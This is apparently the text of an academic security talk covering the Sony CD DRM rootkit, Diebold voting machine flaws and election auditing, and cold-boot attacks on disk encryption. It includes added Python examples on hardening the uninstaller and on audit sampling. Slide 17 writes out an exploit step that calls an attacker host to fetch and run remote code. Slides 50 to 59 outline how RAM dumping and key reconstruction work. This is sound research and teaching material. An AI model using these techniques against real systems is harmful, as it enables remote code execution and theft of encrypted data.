1 Security Through the Lens of Failure J. Alex Halderman

2 Thinking About Failure “Good engineering involves thinking about how things can be made to work; the security mindset involves thinking about how things can be made to fail.” – Bruce Schneier

3 Spectacular Security Failures: Wide Impact; Costly Repairs; Collateral Damage; Systemic

4 Disaster Investigation

5 Lessons from Failures: New Security Intuitions; New Research Directions; Improved Public Policy

6 Spectacular Security Failures: 1. Compact Disc DRM; 2. Electronic Voting; 3. Disk Encryption. Lessons from the Sony CD-DRM Episode, J. A. Halderman and E. Felten, USENIX Security 2006

7 Compact Disc DRM: Restrict use (Untrusted device); Compatibility (Legacy format)

8 Three Generations: 2001, 1st Generation: Passive protection; 2003, 2nd Generation: Active protection; 2005, 3rd Generation: Weak passive + Aggressive active [H02] [H03] [HF05]

9 A Spectacular Failure. Systemic failure: Multiple systems cause danger to users. Mass exposure: Millions of computers vulnerable. Difficult repairs: Most users unaware they’re at risk. High costs: Lawsuits, recalls, lost sales.

10 SunnComm “Light years beyond encryption™” 52 titles 4.7 million discs 37 titles 20 million discs First4Internet

11 Active Protection [H03] (diagram labels: Drivers; Ripper/copier; Application; Protection driver; Normal CD; OS; Autorun; CD Marked “Protected”; Audio CD; Hybrid CD)

12 Rootkit [HF06]. DRM challenge: Users will remove protection driver. Vendor response: Install a rootkit to hide it. Magic prefix: $sys$. Hidden: Files; Processes; Registry keys. “Most people, I think, don't even know what a Rootkit is, so why should they care about it?” — Thomas Hesse, President, Sony BMG Global Digital Business

13 Rootkit [HF06]. DRM challenge: Users will remove protection driver. Vendor response: Install a rootkit to hide it. Attack: Privilege escalation. Mistake: Hides arbitrary objects ($sys$virus.exe). Exploits in wild: Backdoor.Ryknos.B; Trojan.Welomoch.

14 Installer. DRM challenge: Users will decline to install software. Vendor response: Install regardless of consent. Attack: Privilege escalation. Mistake: Incorrect permissions. 13+ MB installed before EULA screen; Everyone: Full Control; Runs with administrator privileges next time CD is inserted.

15 Installer [HF06]. DRM challenge: Users will decline to install software. Vendor response: Install regardless of consent. Attack: Privilege escalation. Mistake: Incorrect permissions. Sony releases patch…but, patch calls potentially booby trapped code. How do users know they need to patch? Vulnerable even if refused installation.

16 Uninstallers [HF06]. DRM challenge: Angry customers demand removal. Vendor response: Offer uninstallers, but limit access.
1. User obtains single-use code for uninstallation web page.
2. Web page calls ActiveX control: CodeSupport.Uninstall("http://www.sony-bmg.com/XCP.dat")
3. Client (CodeSupport.ocx) sends "HTTP GET /XCP.dat" to server sony-bmg.com, which returns XCP.dat.
4. Client extracts InstallLite.dll from XCP.dat, calls UnInstall_xcp().

17 Uninstallers [HF06]. DRM challenge: Angry customers demand removal. Vendor response: Offer uninstallers, but limit access. Attack: Remote code execution. Mistakes (“Rookie mistakes”): Control accepts arbitrary URL; Remote code not authenticated; Control not removed after use.
1. Victim visits attacker’s web page, which calls CodeSupport.Uninstall("http://www.attacker.com/Evil.dat")
2. Client (CodeSupport.ocx) sends "HTTP GET /Evil.dat" to server attacker.com, which returns Evil.dat.
3. Client executes code from Evil.dat with user’s privileges.
“Oops!... I did it again”
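
Added example (not from the slides or from the vendor's code): a model of the control's behaviour as slide 17 describes it, next to a version that fixes the first two listed mistakes by checking the origin and authenticating the payload before running it. The function names, the pinned SHA-256 digest (a stand-in for code signing), the use of https and the payload bytes are assumptions constructed for illustration.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed stand-ins: the real XCP.dat and Evil.dat contents are not on the page.
GENUINE = b"constructed stand-in for the vendor's XCP.dat"
EVIL = b"constructed stand-in for the attacker's Evil.dat"
CONSTRUCTED_WEB = {
    "https://www.sony-bmg.com/XCP.dat": GENUINE,
    "http://www.attacker.com/Evil.dat": EVIL,
    "https://www.sony-bmg.com/constructed-tampered.dat": EVIL,
}

# Assumption: the hardened control ships with the one host it may contact and
# the digest of the one payload it may run.
ALLOWED_HOSTS = {"www.sony-bmg.com"}
PINNED_SHA256 = hashlib.sha256(GENUINE).hexdigest()


def fetch(url):
    """Offline replacement for the HTTP GET the control performs."""
    return CONSTRUCTED_WEB[url]


def uninstall_as_described(url):
    """Behaviour on the slide: any URL is accepted, payload is never checked."""
    return ("run", fetch(url))


def uninstall_hardened(url):
    """Run the payload only if both its origin and its content are expected."""
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.hostname not in ALLOWED_HOSTS:
        return ("refused", "origin not allowed")
    payload = fetch(url)
    digest = hashlib.sha256(payload).hexdigest()
    if not hmac.compare_digest(digest, PINNED_SHA256):
        return ("refused", "payload not authentic")
    return ("run", payload)
```

The third mistake on the slide, leaving the control installed after use, is a deployment issue and is not modelled here.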

18 CD DRM Impact: Millions of dangerous CDs recalled; Class action suits against Sony, vendors; FTC consumer protection investigation; Both protection vendors leave the market; Labels abandon CD copy protection

19 CD DRM Lessons. DRM problem → inherent conflict. New intuition: DRM as a threat to client security. Lack of transparency hid problems. DMCA reform. Mandatory disclosure. Conflicting incentives led vendors to take risks. Liability for harm to users.

20 Spectacular Security Failures: 1. Compact Disc DRM; 2. Electronic Voting; 3. Disk Encryption. Security Analysis of the Diebold AccuVote-TS Voting Machine, A. J. Feldman, J. A. Halderman, and E. Felten, EVT 2007. Machine-Assisted Election Auditing, J. A. Calandrino, J. A. Halderman, and E. Felten, EVT 2007

21 DRE Voting Machines. DRE = Direct Recording Electronic

22 Diebold’s History of Secrecy. Prevented states from allowing independent security audits – hid behind NDAs, trade secret law. Source code leaked in 2003, Hopkins researchers found major flaws. Diebold responded with vague legal threats, personal attacks, disinformation campaign. Internal emails leaked in 2003, reveal poor security practices. Diebold tried to suppress sites with legal threats.

23 We Get a Machine (2006). Diebold AccuVote TS. Obtained legally from an anonymous private party. Software version certified and used in actual elections. First complete, public, independent security audit of a DRE.

24 A Spectacular Failure. Systemic failure: Similar risks in different vendors’ products. Mass exposure: Millions of votes at risk. Difficult repairs: Some attacks not patchable. High costs: Many states have to discard machines.

25 Reverse Engineering [FHF07]

26 Inserting Code [FHF07]. Bootloader; WinCE Kernel; BallotStation. FBOOT.NB0: Bootloader; NK.BIN: WinCE Kernel; INSTALL.INS: BallotStation. (Internal Flash or EPROM) (Internal Flash)

27 Stealing Votes [FHF07] (diagram labels: Kernel; BallotStation; Stuffer; Primary Vote Record; Backup Vote Record; Audit Log)

28 Voting Machine Viruses [FHF07]: Reboot; Single point of infection; Entire county or state

29 Physical Security [FHF07]

30 Physical Security [FHF07]

31 California “Top-to-Bottom” Review: Hart; Sequoia; Diebold

32 E-Voting Lessons. Systemic threats of code injection, viruses. New intuition: DREs and desktops suffer like threats. Blatant problems slipped by gov’t process. Mandatory transparency, paper trails. Improved specs and certification. Market unable to build trustworthy e-voting. Can we use computers to improve voting without having to trust them?

33 Improving Voting Security. Paper Ballots: Physical tampering; “Retail” fraud; After the election. Electronic Records: Cyber-tampering; “Wholesale” fraud; Before the election. Redundancy + Different failure modes = Greater security. But…Redundancy only helps if we use both records!

34 Auditing Approaches: Precinct-based auditing (standard practice); Ballot-based auditing; Expensive; Privacy problems

35 100 marbles, 10% blue; 6300 beads, 10% blue. How large a sample do we need to find error?

36 Why Not Ballot-Based? Need to match up electronic with paper ballots. Difficult without compromising the secret ballot! (Figure: electronic records and marked paper ballots for Alice and Bob, shown unnumbered, numbered 1, 2, 3, and labelled 325631, 218594, 810581.)

37 Machine-Assisted Auditing [CHF07]. Step 1. Check electronic records against paper records using a recount machine. (Figure: shuffled ballots; numbered records 1 Bob, 2 Alice, ... 929 Bob; totals Alice: 510, Bob: 419.)

38 Machine-Assisted Auditing [CHF07] (Figure: numbered records 1 Bob, 2 Alice, ... 929 Bob; totals Alice: 510, Bob: 419.)

39 Machine-Assisted Auditing [CHF07]. Step 2. Audit the recount machine by selecting random ballots for human inspection. (Figure: numbered records 1 Bob, 2 Alice, ... 929 Bob; ballots 321 Bob and 716 Alice compared with their records.)

40 Machine-Assisted Auditing [CHF07]: Machine Recount; Manual Audit. As efficient as ballot-based auditing, while protecting the secret ballot. We can use a machine without having to trust it!

41 Considering Ballot Content [CHF07]. Goal: Reject hypothesis that ≥ 5% of ballots differ between electronic and paper. Goal: Reject hypothesis that ≥ 5% of ballots are marked electronically for Alice but on paper for Bob. Only need to audit ballots marked for Alice.

42 Evaluation [CHF07]: 2006 Virginia U.S. Senate race; 0.3% margin of victory; We want 99% confidence
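
Added example (not from the slides or from [CHF07]): the sample-size question on slide 35 and the "reject the hypothesis that ≥ 5% of ballots differ" goal on slide 41, worked as sampling without replacement. The function names are hypothetical, the 1% risk limit applied to the marbles and beads is taken from the 99% confidence on slide 42, and the 1,000,000-ballot population is constructed.

```python
def miss_probability(population, bad, sample):
    """Chance that `sample` items drawn without replacement contain none of
    the `bad` (mismatching) items: C(N - D, n) / C(N, n)."""
    p = 1.0
    for i in range(sample):
        good_left = population - bad - i
        if good_left <= 0:
            return 0.0  # more draws than good items: a bad one must appear
        p *= good_left / (population - i)
    return p


def audit_sample_size(population, bad_percent, risk):
    """Smallest sample that would contain at least one bad item with
    probability >= 1 - risk if at least bad_percent% of items were bad.
    Drawing that many and finding no bad item rejects the hypothesis."""
    bad = -(-population * bad_percent // 100)  # integer ceiling, no floats
    if bad <= 0:
        raise ValueError("hypothesised error rate must be above zero")
    for n in range(1, population + 1):
        if miss_probability(population, bad, n) <= risk:
            return n
    return population


if __name__ == "__main__":
    cases = [
        ("100 marbles, 10% blue", 100, 10),
        ("6300 beads, 10% blue", 6300, 10),
        ("1,000,000 ballots (constructed), 5% differ", 1_000_000, 5),
    ]
    for label, population, percent in cases:
        n = audit_sample_size(population, percent, risk=0.01)
        print(f"{label}: sample {n} for 99% confidence")
```

The population grows 63-fold between the marbles and the beads while the required sample grows from 36 to 44, which is why auditing individual ballots needs far fewer inspections than auditing whole precincts.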

43 Spectacular Security Failures: 1. Compact Disc DRM; 2. Electronic Voting; 3. Disk Encryption. Cold-Boot Attacks on Encryption Keys, J. A. Halderman, S. Schoen, N. Heninger, W. Clarkson, W. Paul, J. Calandrino, A. Feldman, J. Appelbaum, E. Felten. In submission, 2008

44 Data Theft Threat: OS Access Control; Attacker’s Computer

45 Disk Encryption Defense: File System; Disk Drivers; On-the-Fly Crypto; Password: ********

46 A Spectacular Failure. Systemic failure: Nearly all disk encryption products at risk. Mass exposure: Millions vulnerable in common use case. Difficult repairs: No simple hardware or software remedies. High costs: Critical data at risk despite encryption.

47 Disk Encryption Defense. Security Assumptions: The OS protects the key in RAM. The attacker might reboot to circumvent the OS, but since RAM is volatile, the key will be lost.

48 Dynamic RAM Volatility. DRAM Cell (Capacitor): Write “1”; Refresh (Read and rewrite); Refresh Interval ≈ 32 ms. What if we don’t refresh? Security Hardness Assumptions: Data fades almost instantaneously without refresh. Any residual data is difficult to recover.

49 DRAM Remanence [HSHCPCFAF08]. 5 secs; 30 secs; 60 secs; 300 secs. Assumed: DRAM data fades almost instantaneously. Observed: Data fades gradually, over seconds or minutes. Unidirectional; Highly predictable. Decay doesn’t spike until 10s or 100s of missed refreshes (almost 100% recovery for first few seconds).

50 Capturing Residual Data [HSHCPCFAF08]. Complication: Booting OS overwrites large areas of RAM. Solution: Boot a small low-level program to write out memory content. Implementations: PXE Dump (9 KB); EFI Dump (10 KB); USB Dump (22 KB). Assumed: Any residual data is difficult to recover. Observed: Residual data can be captured easily, with no special equipment.

51 Basic Cold-Boot Attack [HSHCPCFAF08]: Screen-locked machine (if hibernating/sleeping, just wake it up!); Dumping RAM…

52 Countermeasure. BIOS: Clearing RAM… !!! Common in machines that support ECC RAM

53 Advanced Cold-Boot Attack [HSHCPCFAF08]: Attacker’s Computer; Dumping RAM… Won’t RAM data decay too quickly?

54 DRAM Cooling [HSHCPCFAF08]

55 Dealing with Bit Errors [HSHCPCFAF08]. Some bit errors inevitable, especially without cooling (worsening as memory density increases). Given corrupted K’, find K. Naïve Approach: Brute-force search over low Hamming distance to K’; 256-bit key with 10% unidirectional error rate (slow!). Insight: Most programs store precomputed derivatives of K, for performance (e.g. key schedules). These derivatives contain redundancy, treat them as error correcting codes. (Performance vs. security)

56 AES Key Schedule. 128-bit key K → 10 more 128-bit keys for cipher rounds. Round 0 key (= K); Round 1 key; …; Round 10 key; Core. Output: 176 bytes of key material

57 AES Key Reconstruction [HSHCPCFAF08]. Round 0 key (= K); Round 1 key; Core: Rotate 8 ByteSub. Slices: 7 bytes, uniquely determined by 4 bytes from K. Find likely decodings of slice, given error model. Combine decodings to form candidate K’s. Test candidates against full key schedule. In practice, reconstruction almost always unique.

58 Reconstructing Other Keys [HSHCPCFAF08]: 256-bit AES, DES (key schedules); LRW tweak keys (multiplication tables); RSA private keys (primes P and Q). Also: Key Finding. Insight: Target precomputation products instead of keys, use their redundant structure to locate them automatically.

59 Practical Attacks [HSHCPCFAF08]: Windows Vista BitLocker; Mac OS FileVault; Linux dm-crypt; Linux LoopAES; TrueCrypt

60 Disk Encryption Lessons. DRAM security assumptions were wrong. OS access control weaker than thought. New threat model for memory. New risk profile for users. Abstraction hid security problems. Investigate other abstractions. CPU microcode? Running software has nowhere to store secrets. Secure memory architectures. Storing secrets in the user.

61 Contributions and Impacts
1. Compact disc DRM: Inherent limitations of CD copy protection [H02, H03]; Client security dangers of aggressive DRM [HF06]. → Music industry abandoned CD DRM, then DRM
2. E-voting: First comprehensive academic review of a DRE [FHF07]; Systemic problems in related voting systems [CFHWYZ07]; Trustworthy computer-assisted auditing [CHF07]. → National shift away from DRE voting
3. Disk encryption [HSHCPCFAF08]: Cold-boot attacks against encrypted disks; Experimental characterization of DRAM remanence; Automatic key finding and reconstruction. → Security community rethinking memory threat models

62 Eight Research Directions I Didn’t Have Time to Talk About
Privacy protection for camera phones. H., Waters, and Felten, WPES 04
Client puzzles for denial-of-service prevention. Waters, Juels, H., and Felten, CCS 04
Convenient web password security. H., Waters, and Felten, WWW 05
Harvesting challenges from oblivious online sources. H. and Waters, CCS 07
Voting machine hardware analysis. H. and Feldman, 2008
AACS security flaws, DRM game theory. In preparation
Safely using cryptographic randomness in elections. In preparation
Repairing insecure DRE voting machines. In preparation

63 Thank You! www.cs.princeton.edu/~jhalderm

64 References
H02: H. Evaluating New Copy-Prevention Techniques for Audio CDs. DRM 2002.
H03: H. Analysis of the MediaMax CD3 Copy-Prevention System. 2003.
HF06: H. and Felten. Lessons from the Sony CD DRM Episode. USENIX Security 2006.
FHF07: Feldman, H., and Felten. Security Analysis of the Diebold AccuVote-TS Voting Machine. EVT 2007.
CHF07: Calandrino, H., and Felten. Machine-Assisted Election Auditing. EVT 2007.
CFHWYZ07: Calandrino, Feldman, H., Zeller, Yu, and Wagner. Source Code Review of the Diebold Voting System. 2007.
HSHCPCFAF08: H., Schoen, Heninger, Clarkson, Paul, Calandrino, Feldman, Appelbaum, and Felten. Lest We Remember: Cold Boot Attacks on Encryption Keys. In submission, 2008.

